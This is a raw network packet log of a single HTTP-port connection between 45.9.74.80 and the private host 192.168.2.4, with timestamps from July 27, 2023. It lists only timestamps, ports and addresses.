Jul 27, 2023 20:19:00.295485020 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.295552015 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.295578003 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.295634985 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.295679092 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.295702934 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.295744896 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.297179937 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.298923016 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.298965931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.299010992 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.299024105 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.299063921 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.299105883 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.299144983 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.299163103 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.299186945 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.299216986 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.299252987 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.299292088 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.299330950 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.299348116 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.299381018 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.299401045 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.299437046 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.299474955 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.299519062 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.299530029 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.299561024 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.299582005 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.299619913 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.299655914 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.299694061 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.299710035 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.299735069 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.299762964 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.299803019 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.301717043 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.304435015 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.307024002 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.307102919 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.307141066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.307171106 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.307203054 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.307239056 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.309983015 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.310033083 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.310081959 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.310132980 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.310446024 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.310822964 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.310868979 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.310914993 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.310936928 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.310981035 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.311005116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.311050892 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.311099052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.311152935 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.311181068 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.311198950 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.311244011 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.311826944 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.311872959 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.311917067 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.311943054 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.311983109 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.312014103 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.312630892 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.312680006 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.312726974 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.312747955 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.312787056 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.312814951 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.313873053 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.313918114 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.313971996 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.313986063 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.314011097 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.314050913 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.314100027 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.314146042 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.314191103 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.314208984 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.314249992 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.314275980 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.314317942 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.314361095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.314405918 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.314426899 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.314451933 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.314488888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.316220999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.316288948 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.316363096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.316378117 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.316400051 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.316440105 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.316735029 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.316783905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.316828012 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.316852093 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.316905975 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.316936970 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.317169905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.317250967 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.317296028 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.317316055 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.317341089 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.317379951 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.317926884 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.317972898 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.318018913 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.318042040 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.318079948 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.318128109 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.318172932 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.318218946 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.318257093 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.318284988 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.318320990 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.318350077 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.318394899 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.318439960 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.318479061 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.319432020 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.319475889 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.319520950 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.319540024 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.319601059 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.321887016 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.321949005 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.321990967 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.322047949 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.322077036 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.322108984 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.322134018 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.322176933 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.322217941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.322264910 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.322276115 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.322299957 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.322335005 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.322372913 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.322415113 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.322453976 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.322470903 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.322510004 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.322526932 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.322570086 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.322609901 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.322649002 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.322669029 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.322706938 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.322726965 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.322770119 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.323923111 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.323973894 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.323995113 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.324012995 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.330241919 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.330291986 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.330410957 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.333152056 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.333204985 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.333250046 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.333303928 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.333317995 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.333343029 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.333458900 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.333520889 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.333564043 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.333641052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.333688974 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.333734989 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.333775997 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.333801985 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.333856106 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.333885908 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.334167957 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.334216118 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.334260941 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.334284067 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.334323883 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.334348917 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.335042953 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.335108042 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.335160017 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.335175037 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.335199118 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.335238934 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.341941118 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.342024088 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.342087030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.342127085 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.342156887 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.342214108 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.342271090 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.342335939 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.342387915 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.342426062 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.342474937 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.342513084 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.342571020 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.342629910 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.342675924 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.342715025 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.342766047 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.342798948 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.342856884 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.342915058 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.342962027 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.342998981 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.343046904 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.343084097 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.343146086 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.343206882 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.343259096 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.343372107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.343420982 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.343458891 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.343518019 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.343575954 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.343643904 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.344841003 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.344891071 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.344913006 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.344961882 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.345005035 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.345046997 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.345071077 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.345113039 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.345138073 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.345184088 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.345227957 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.345269918 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.345293999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.345335007 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.345359087 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.345402956 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.345448017 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.345489979 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.345623016 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.345675945 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.345721006 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.345772028 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.345824003 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.345838070 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.349323988 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.349360943 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.349395037 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.349433899 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.349445105 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.349457979 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.349543095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.349575996 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.349591017 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.349626064 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.349659920 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.349673033 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.349704981 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.349739075 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.349770069 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.349785089 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.349807024 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.349829912 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.349863052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.349895954 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.349931002 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.349946022 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.349977016 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.349989891 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.350146055 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.350178957 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.350233078 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.352688074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.352727890 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.352762938 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.352778912 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.352807045 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.352827072 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.355653048 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.355703115 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.355747938 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.355794907 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.355825901 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.356014967 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.356060982 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.356106043 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.356151104 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.356169939 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.356210947 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.356399059 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.356448889 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.356494904 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.356539965 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.356558084 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.356585026 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.356621981 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.357347012 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.357393980 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.357450962 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.357472897 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.357512951 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.357536077 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.365441084 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.365509033 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.365554094 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.365572929 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.365613937 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.365639925 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.365685940 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.365776062 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.365825891 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.365839005 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.365870953 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.365901947 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.365946054 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.365991116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.366035938 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.366053104 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.366095066 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.366116047 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.366163015 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.366206884 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.366251945 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.366307020 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.366324902 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.366367102 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.366411924 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.366462946 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.366475105 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.366519928 CEST	80	49693	45.9.74.80	192.168.2.4
